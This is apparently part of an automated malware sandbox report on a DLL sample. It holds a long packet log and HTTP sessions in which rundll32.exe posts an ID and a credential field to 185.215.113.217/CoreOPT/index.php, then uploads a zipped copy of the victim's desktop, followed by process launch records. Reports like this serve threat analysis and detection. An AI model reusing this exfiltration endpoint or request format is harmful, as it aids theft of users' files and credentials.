                              Oct 27, 2024 17:47:23.472071886 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.472084045 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.472095966 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.472119093 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.472131014 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.472145081 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.472203016 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472213984 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.472235918 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.472238064 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472238064 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472325087 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472343922 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.472356081 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472357035 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.472373009 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.472377062 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472444057 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472444057 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472461939 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.472484112 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.472614050 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.472672939 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472687006 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472733974 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472733974 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472779989 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472779989 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472804070 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472836971 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.472841978 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472841978 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472858906 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.472891092 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473015070 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473057032 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473057032 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473084927 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.473129034 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473155975 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.473180056 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473180056 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473206997 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.473220110 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.473223925 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473241091 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.473288059 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.473315001 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473332882 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.473346949 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.473356009 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473356009 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473431110 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.473437071 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473478079 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473498106 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.473520041 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473520041 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473556042 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.473573923 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473573923 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473620892 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.473726034 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.473747969 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.473808050 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.473831892 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473850965 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473875999 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.473879099 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473918915 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473947048 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.473974943 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474001884 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.474003077 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474003077 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474051952 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474051952 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474148989 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474159002 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.474174976 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474221945 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474221945 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474302053 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474302053 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474328995 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474406958 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474406958 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474427938 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.474435091 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474442005 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.474458933 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.474473000 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.474483967 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.474488020 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474498034 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.474534035 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.474591970 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474591970 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474617004 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.474627018 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474627018 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474653006 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474682093 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474721909 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.474744081 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.474838972 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474884033 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474884033 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474889040 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.474929094 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474929094 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474951982 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474957943 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.474998951 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.474998951 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475028038 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.475040913 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475040913 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475043058 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.475087881 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475106955 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475155115 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.475156069 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475214005 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475238085 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475267887 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.475270987 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475287914 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475358963 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475419998 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475419998 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475447893 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475514889 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475544930 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475544930 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475580931 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.475594044 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.475610018 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475617886 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.475630999 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.475639105 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475698948 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475712061 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475728989 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.475742102 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.475754976 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.475759983 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475759983 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.475883007 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.475912094 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.475927114 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.475989103 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476013899 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476033926 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476068020 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476068020 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476088047 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.476116896 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476116896 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476154089 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476154089 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476175070 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.476196051 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.476200104 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476200104 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476270914 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476285934 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.476299047 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.476375103 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476423025 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476423025 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476452112 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476461887 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.476475000 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.476535082 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476546049 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.476576090 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476596117 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476695061 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476695061 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476726055 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476743937 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.476772070 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.476799011 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476819992 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476825953 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.476880074 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476880074 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476917982 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476917982 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.476922035 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.476934910 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.476948977 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.476974010 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.476985931 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.477072954 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.477169037 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.477180958 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.477193117 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.477387905 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.477454901 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.477468014 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.477632046 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.477729082 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.477787018 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.478017092 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.478032112 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.478087902 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.478101015 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.478141069 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.478163958 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.478231907 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.478343010 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.478355885 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.478451967 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.478625059 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.478647947 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.478754997 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.478812933 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.478872061 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.479087114 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.479120970 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.479191065 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.479258060 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.479270935 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.479388952 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.479410887 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.479476929 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.479552984 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.479629993 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.479643106 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.479832888 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.479938984 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480173111 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480195999 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480210066 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480232000 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480243921 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480307102 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480367899 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480381012 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480437040 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480448961 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480460882 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480494022 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480556011 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480571032 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480628014 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480737925 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480875015 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.480914116 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.481014967 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.481036901 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.481049061 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.481259108 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.481281042 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.481638908 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.481651068 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.481745005 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.481756926 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.481769085 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.481820107 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.481832981 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.482136965 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.482160091 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.482175112 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.482269049 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.976797104 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.976967096 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:24.239131927 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:25.161758900 CET4973080192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:32.413115025 CET4973280192.168.2.4185.215.113.217

                              HTTP Request Dependency Graph

                              • 185.215.113.217

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449730185.215.113.217807108C:\Windows\SysWOW64\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Oct 27, 2024 17:47:05.254812002 CET174OUTPOST /CoreOPT/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.217
                              Content-Length: 21
                              Cache-Control: no-cache
                              Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                              Data Ascii: id=246122658369&cred=
                              Oct 27, 2024 17:47:06.286526918 CET190INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Sun, 27 Oct 2024 16:47:06 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.449731185.215.113.217807116C:\Windows\SysWOW64\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Oct 27, 2024 17:47:05.255920887 CET174OUTPOST /CoreOPT/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.217
                              Content-Length: 21
                              Cache-Control: no-cache
                              Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                              Data Ascii: id=246122658369&cred=
                              Oct 27, 2024 17:47:06.264381886 CET190INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Sun, 27 Oct 2024 16:47:06 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Oct 27, 2024 17:47:23.432248116 CET170OUTPOST /CoreOPT/index.php?wal=1 HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----MzA4MQ==
                              Host: 185.215.113.217
                              Content-Length: 3241
                              Cache-Control: no-cache
                              Oct 27, 2024 17:47:23.432476044 CET140OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 7a 41 34 4d 51 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                              Data Ascii: ------MzA4MQ==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                              Oct 27, 2024 17:47:23.432559013 CET6OUTData Raw: 50 4b 03 04
                              Data Ascii: PK
                              Oct 27, 2024 17:47:23.432637930 CET6OUTData Raw: 14 00 00 00
                              Data Ascii:
                              Oct 27, 2024 17:47:23.432687998 CET6OUTData Raw: 08 00 54 40
                              Data Ascii: T@
                              Oct 27, 2024 17:47:23.432775021 CET6OUTData Raw: 44 57 2f 31
                              Data Ascii: DW/1
                              Oct 27, 2024 17:47:23.432797909 CET6OUTData Raw: d7 cb 82 02
                              Data Ascii:
                              Oct 27, 2024 17:47:23.432848930 CET6OUTData Raw: 00 00 02 04
                              Data Ascii:
                              Oct 27, 2024 17:47:23.432912111 CET6OUTData Raw: 00 00 17 00
                              Data Ascii:
                              Oct 27, 2024 17:47:23.432952881 CET6OUTData Raw: 00 00 5f 46
                              Data Ascii: _F
                              Oct 27, 2024 17:47:23.433193922 CET6OUTData Raw: 69 6c 65 73
                              Data Ascii: iles
                              Oct 27, 2024 17:47:23.976797104 CET190INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Sun, 27 Oct 2024 16:47:23 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.449732185.215.113.217807220C:\Windows\SysWOW64\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Oct 27, 2024 17:47:11.382829905 CET174OUTPOST /CoreOPT/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.217
                              Content-Length: 21
                              Cache-Control: no-cache
                              Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                              Data Ascii: id=246122658369&cred=
                              Oct 27, 2024 17:47:12.415534973 CET190INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Sun, 27 Oct 2024 16:47:12 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\System32\loaddll32.exe
                              Wow64 process (32bit):true
                              Commandline:loaddll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll"
                              Imagebase:0x860000
                              File size:126'464 bytes
                              MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:1
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:2
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:3
                              Start time:12:47:03
                              Start date:27/10/2024
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\0j6nSbUQQS.dll,Main
                              Imagebase:0x860000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
